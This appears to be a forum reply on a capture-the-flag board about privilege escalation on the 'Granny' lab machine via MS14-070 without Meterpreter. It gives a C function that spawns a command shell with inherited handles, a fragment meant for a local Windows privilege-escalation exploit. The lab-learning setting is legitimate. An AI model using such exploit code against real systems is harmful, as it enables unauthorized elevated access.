Granny privesc (MS14-070) WITHOUT meterpreter

Off-topic Exploits
, , ,
4

Hi,

try this:


BOOL WINAPI CreateNewCmdProcess (STARTUPINFO *startupInformation, PROCESS_INFORMATION *processInformation)
{
        ZeroMemory (&startupInformation[0], sizeof (STARTUPINFO));
        startupInformation->cb = sizeof (STARTUPINFO);
        startupInformation->lpDesktop = "WinSta0\\Default";
        ZeroMemory (&processInformation[0], sizeof (PROCESS_INFORMATION));

        LPTSTR lpComspec;
        lpComspec= (LPTSTR) malloc(1024*sizeof(TCHAR));
        GetEnvironmentVariable("comspec", lpComspec, 1024); 

        return CreateProcess (
                lpComspec,
                NULL,
                NULL,
                NULL,
                TRUE,
                0,
                NULL,
                NULL,
                &startupInformation[0],
                &processInformation[0]
        );
}